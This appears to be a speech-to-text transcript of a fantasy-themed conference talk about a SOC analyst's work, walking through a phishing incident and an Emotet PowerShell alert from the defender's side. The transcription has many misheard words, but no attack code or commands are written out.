The Ticket To Adventure: A Security Analyst's Journey

good morning babystone

glad to be here and glad to have you all here i'm going to go over the life of a security analyst in our adventure the ticket to adventure the security analyst analyst journey i am your dungeon master and guide so we'll be going over the prologue of the story how the soxben envisioned and those role those expectations involved with being a sock working at a sock and being a sock analyst and the typical tools and expectations required and we'll even have some encounters where we get the biphone monster and these are based off of real incidents that we've had so the first step is always scariest but as a stock analyst you're stepping into a

role of i.t security and there are things levied upon you responsibilities of any problem that you are to help out the organizations

so about me about me so previously uh before i work at a sock i've been with the military for i would say 14 years of my life 12 years was enlisted working from food service to military intelligence then i eventually left the government or left the military worked as a civilian supporting cyber operations rather as a contractor or a government civilian and then i was like you know what i want to be more hands-on so i jump out of the government entirely to do stock analyst work for secure works so i am an information senior information insurance advisor on the side i do video game development with the starchase's theme i am with the blue team village distinct

pixels and curated intelligence and my hobbies as you can see are all fantasy related so hence the way how this is formed we'll have time so let's go over to stock and how socks are envisioned so here you have your have a way that the military likes to depict it it does look like that at times and then for the civilian side you either may go to this route at the very first or you go to the middle which is more like an office space that's also very common but now that we move to the virtual sock with the pandemic and everyone being worked from home you're still connected through the virtual environment but you're able to

support it and that's thanks to the cloud services that are that enable sock to continue to operations so let's go over to what a security operation center is and how it fits into the picture it is the nexus of all security related matters it is the hub where everyone receives information from either the telemetry or the people within the organization bringing forth issues such as credential uh default credentials and they get a repository or missing computers and the socks are generally actually the coordinators with other organizations so they work with the vulnerability management team with sock we work with the service desk active directory team those will be key players when incidents happen now we want to look into how does it fit

in so the sock is the eyes and ears the extension of the policies so all the governance and i.t policies that happen it supports the actual policies just a computer means to it so the soxies use that telemetry to see what goes on to the network and that will come into part of the day-to-day life of a soft analyst so we're going to look into this this little graph here that goes into the the how the data is processed so all the logs endpoint data the everything is correlated going from the preliminary investigation to the triaging those have different layers and that's where the tier processes talked about and that tier process so when they said i need a tier 1 stock

analyst tier 2 sock analysts or l1 zl2s those actually go back to the i.t terms for the it service management levels in uh part of itil foundation because you're still providing the service as a stock analyst now that tier to zero is the automation there's been a portion to have all most of those functions automated but there's also the tier one side the side the tier one side analyst who takes those information whether it is from the people that are calling in about it or the service desk or even the thread intel it usually comes to them while some actions can be automated there's still also the need to have the user provide the interaction

and then they'll start triaging which one looks looks more important that needs to go into the investigations that's where the tier 2 comes in the tier 2 is the investigating arm they will go over the investigate go over to prove it is either a false positive or it is something that needs to be escalated and responded to but the tier 2 has the ability to do root cause analysis of why that alert happened and sometimes it may be just an i.t configuration now we got the tier three who are the responders so they handle the containing slash quarantining and pushing for the remediation and they'll coordinate that update now the reason why tier 2 tier 3 aligns with tier 2 to a degree

because tier 2 generally comes to tier 3 as the subject matter expert for guidance so it's not always going to be escalation when it comes to the going forth from the tier 2 tier 3. they'll ask for inputs from the tier 3 to help them with the investigation and tier 2 can still finish it on their own so that's why there's a bit of a blend between the extended investigation and the containing response now it's not to say that tier 2 cannot respond as well they're limited though surely what i've seen in environments that has generally been related to emails that can be contained but there's rare occasions when they can contain the host but that's not normal

everything you do keep a ticket the ticket is what says you are the owner of the incident or the investigation so if you do not have a ticket it did not count because all the work you do that is your receipt saying i've done this job that goes into metrics which is the dreaded word for stock analyst metrics or kpis now let's meet our heroes now these are the components that are typically associated with uh security operation center typically atypically in different departments now the left most side are the typical side from your security analysts who are generally your l1 and l2 sock analysts the specialization tends to come into the digital forensics incident responder

and threat hunters you can count the security engineers as well but the security engineers have a different role entirely in that component of the sock but they are still a good they are still a huge component because they built those detections and also the sock can eventually pivot when they learn the environment long enough as well as the tooling now your atypical side are your threat intelligence analysts and your malware analysis because those are specializations that sometimes the socket may have but most of that probably won't have directly and remote from what i've seen has always been in a different department have been either the red team or pin testers pen testers are usually external

organization or if this is an internal it's still going to be in a different department each have their own particular skill sets as you see the most notable thing about them so if you want to know the most notable thing about the security analyst they detect you want to know the most of the notable thing about the threat intelligence they attribute to what actor did it

now we go to the expectations of a sock analyst as i mentioned earlier they are the technical eyes and ears of the policies and in most cases if the bad guys in the network they act as the cyber defense and drive the bag out of the network and the most important thing that the stock can bring to the table that helps the organizations is bringing bringing the recommended security controls they are the ones that see a gap in the security measures and that goes into why they must mirrors it familiarize with the policy that goes on an organization each organization has a different set of priorities that they expect the stock analyst to know and

maintain the order in the company because soccer is still part of the security just a cyber arm of it and that actually fits in line with the user engagement of enforcing the policy so there is still a customer service aspect to working at a sock so if you are not looking forward to talking to people yeah you're gonna have to buckle up on it because that's part of a sock analyst role now the technical expertise it comes with knowing how to research so knowing your olson knowing your sources being able to investigate having that curiosity being able to put those puzzles together and another aspect of it is as the technology impact evolves you have to

evolve too because new technologies are being brought in like the cloud services so if you are not smart up on the cloud that's going to be in your future i'll start getting smart up on the cloud infrastructure because that's what's going to be expected for the sock to monitor and protect that's just an example of one we've all seen github's involved now the typical tools you have your sim which is your little glass pane glass of metrics that are going on the network you see anomalies and the l1 typically finds what looks more worthy of doing a network traffic or worthy of investigating so it is like this little dashboard here and the soar which is the

security orches orchestration and automatic automated tool it is useful for now the app is typically advertised as the one-stop shop of automating all the functions of the security operating center but realistically i've it's mostly used as a playbook in terms of what steps the stock should be at and no no taking their actions because while the two from while the various solutions do talk about this is what they can bring the table like automatic virus total lookups that's something we'll probably do manually regardless now end point to endpoint solutions now you've heard of edrs and xdrs the endpoint detection and response and the extended detection response the key difference of that once the extended has networking data that it

brings in but that's limited i've mostly seen domain related ones there are sometimes there are some that will give you the telemetry of the actual url but that's very few and far and then you have your external tools like url scan virus total those awesome tools that will help uh help you in the library now we go into the day-to-day cases that we handle as a sock now the typical ones are always phishing network monitoring dlp support data loss prevention the key thing like the socks going to see day-to-day in their um check their email see what tickets going on most of the things that are have typically happened day-to-day dealing with policy violations whether someone

is sending an email or that contain sensitive information to their personal email that falls in line with data loss prevention support or sometimes it's downloading and unauthorized software which can lead to a major incident because that unauthorized software may tend to have malware or maybe a trojan eyes malware but in the end it comes with it goes back to the policy violations because that's how that's become part of security gaps atypical cases now these examples are pulled from the assistance of threat intelligence that you that either the company has internally or externally some services but create a website credential theft so investigating accounts being sold on the dark web or third-party investigations which that's more of a partnership thing and

making sure the company's data is not impacted by that that loss because ransomware is everywhere at this point 2021 has been a year the ransomware tier 22 is going strong and then stolen devices devices get stolen and the socks arm in this is just to make sure that that uh what data was lost from the like if the computer had data in it that is permanent to the company so those are some atypical sort of cases but it all goes back to having a ticket

now we go into the sock encounters now the stock encounters in this scenario you are the thought that uh tier two stock and i was working for a financial organization the important consideration when handling these types of cases are when should you do the puzzle solving and when should you focus on the incident itself so encounter one phishing the l1 identify someone clicked on a malicious link flagged by the email securities analytics so we got here highlighted in red that yogurt clicked on something from zeon fanboy that email so what do we do the first things always do in an investigation is a validity validate isn't malicious validate is it uh do they really click on it

mostly the um the important part is is the site malicious because you already got the metrics telling me that there was a click now in order to do that you have to do some information gathering so doing the surface level finding out the originating email either the skit also the scale of it so how you get the original email either the automation tool will give it to you sometimes you got to get the email itself from the user or it is um collected through third-party solutions so we're going to use the eye of volcanon that is our xor sim roll into one this gives us god eye view into the network that we're protecting so we got the key artifacts here

we got the sender recipient subject of the email and the url that was clicked and a small render of what that email looked like microsoft security warning you have some un undelivered emails clustered released to the inbox so in order to do that we want to look at two things either we investigate the email itself or investigate where the url is going to because we're focusing on incident itself and the timeliness of the maliciousness we're going to investigate the url itself first so some internal um always use your internal tools first whatever the company whatever the organization gives you use their tools first however some noteworthy tools that are useful externally is url scan do the search function because

someone may have already dealt with this before and you can use that to get uh get the time of when it probably started as well that could be useful for the cti team otherwise you can also um use that to validate if it's malicious or not if it's if you have if it's not been done before yeah you may consider buying a bullet and doing a b in the first guinea pig to do uh the verification of the email and there's also virustotal that's also useful one now always do it in the sandbox if you are at work however do not use browserlink because browserlink will have the uri that still has the email of the url associated which can be

flagged by the company i've seen it happen it's not pretty it evolves see some talk and those are not pretty now in this case it renders it renders to a very suspicious credential harvester the thread has been confirmed role initiative

now we got the fish we've got the lead and we got the security analyst who has to react now the it is the threat actors first turn and with that first turn he already has credentials so he's gonna roll for being able to crack into the uh to the person's account however he wrote a four and he failed because why multi-factor authentication prevented him from being able to access the account so now the the stock analyst has has the ability to make their move and make the remediations before it gets worse now the responses you're in the response phase of an incident so in this you're going to be containing now the containment part actually before we move to containment

we still need to collect some information so order to impact the recipients in this case it's only been one person who received it and if you had more you approach prioritize on any clickers and you can validate the logins with the proxy log even the input um even the endpoint solutions can get a tracking of how many people clicked on it but sometimes you choose which ones ever faster and then after you do that you do the credential reset and purging of those emails that was the turn of the sock analysts

now this is actually so part of this has been a real response but also this has been also part of a real incident that had happened i want to say about last year or so the chipotle emails were used as lures someone compromised the messaging service that chipotle uses which is mail gunner and that mel gunner account was used to send a mass marketing email to the people that are signed up on them but it was a phishing email and that was how so that was a very big case now now that the situation's been contained you can do some pulse and uh pulse incident analysis so this is the time where you can go back into the puzzle

solving side of things because this information can that being collected can be sent to the cti now some considerations use a text editor because some cases like the i will actually share a case that i had with um the mail gunner was used as an example because i had to deal with the case with that before and upset fell on my part was that i opened up the email itself even though the image did not render it did not render it still sent a call out to the tracker but it was blocking the proxy but this would have been like a big notice of the bad guy like hey either someone is they got some clickers or if

they know something that is more than usual someone's probably doing some analysis so always um try to render with the text editor and review offline too so you don't get exposed on that tracker and yeah also pay attention to custom headers because that's going to be important in identifying what tool was used so a bit of extra credit or bonus stage oh no this we'll call this extra credit for now so for the extra credit in this case we look at the example here for the headers it was using the spm and dkim pass for chipotle and then at the very bottom is where you see the mail gun custom headers so small gun custom headers are useful

to know what tool is being used is not used for attribution because in this case that ip address goes back to mail gunner instead of the bad guy who used it but it's good to know like what tools were leveraged during that now we gotta go to bonus stage so remember that url that we saw that was clicked on it that was clicked on well most of those uris are generally written in base64 either is written in base64 or base64 deflated so we're going to resolve this to see what it was going to because that can actually reveal the extra ioc involved with this so we're going to use cyber shot cyber chef is a

definitely an awesome tool that every stock analyst should have in their repository now if you are within the company um it's probably recommended to see if you can have it in a server of your own or in your it that way the company data does not go out to the cloud now for this case we're going to put the uri in everything that began and then to cheat a bit i use magic and then for that i want to do a z z library inflate we get an extra set of ioc that it goes out to oh pause for a little breather see the cute little own critter throwing all my weapons that away

say hi to the mimic it'll be guarding myself okay now we'll move to encounter two encounter two hours after dealing with the phishing campaign it seemed like it was time to rest but this time these alert picks up on the sim regarding a suspicious process on a business laptop so here you now see microsoft office spawning and abnormal process we go back to the audible comment so research what's going on you can already see in here the user that that was involved speedy hedgehog and the powershell script that triggered here's the power shell so we go back to our old friend cyber chef cyber chef is useful to help us and we're going to render it

do our search we picked up some ioc's that are associated you see here that's go that's going out to various um domains or various urls so it can pull out the file demonstrations draken fern role initiative this time the threat's even bigger we got immo chat now emil ted takes his first attack on the l on the l2 sock analyst l2 is exhausted so it pulls in the l3 l3 stock analyst gets involved and they are still called in to support the l3 because we need to know the scope so the l2 can handle these continuous scoping and l3 handles the response in that response the l the l3 takes their actions to can isolate the host

as well as temporarily disable the user account and notify the the purpose stakeholders now this is something that can be done at a local host level because at the host level the end point because that one is low impact compared to say a server that would require a bigger escalation bigger key players to involve but in this case because this is low impact the uh containment can be handled by the analysts themselves so that was the response taken on here now i mentioned before about root cause analysis this is something that the stock can bring to the table now earlier in this example there was not office exe used with the excel that was not one of the artifacts

so further forensics had to be used in this case we find out that the person accessed their gmail account which was how they access the the phishing malware which if you see here is a password protected file and it's doing a reply this is typically part of the mltec ttp's whereas email hijacking with the password and the policy recommendations prevent access and none work emails that's something that the stock can bring to the table that's a recommended policy change now this is based off a february immitech campaign that occurred victory so skill building and progression so if you are looking to progress there are accessible blue team training with try hack me blue team level one routine

level one even offers certification out of it and also john strands pay what you can that one is very phenomenal and recommend you take it now some cyber ranges that are available you have try hack me range force lusty finn and i mentioned the um blue team and they even have an online labs range now if you have some personal setups you can do cyber defenders which has various things such as malware analysis work with the sims for threat hunting and incident response type roles and sockvale which has some personalized vms but you need to set up your own labs for that whereas other ones the skill progressions so i'll close this out so if you as a from a senior stock

analyst to the junior side i generally recommend that if you do get access to an environment try to learn it because some things are socks are being rolled into having multiple clients so it's harder to see their environments documented processes if it's effective so junior analysts can be able to jump in when they are on board knowledge sharing is caring so events like this this is a chance to share that knowledge and the stock analyst is never alone they are working with that service desk team they're working with the active directory team the verb building management in these cases my stuff for the story but that's okay these are special thanks to the people who contributed to art

uh for the projects of all most of the art were custom made and this is me

that's the end [Music] you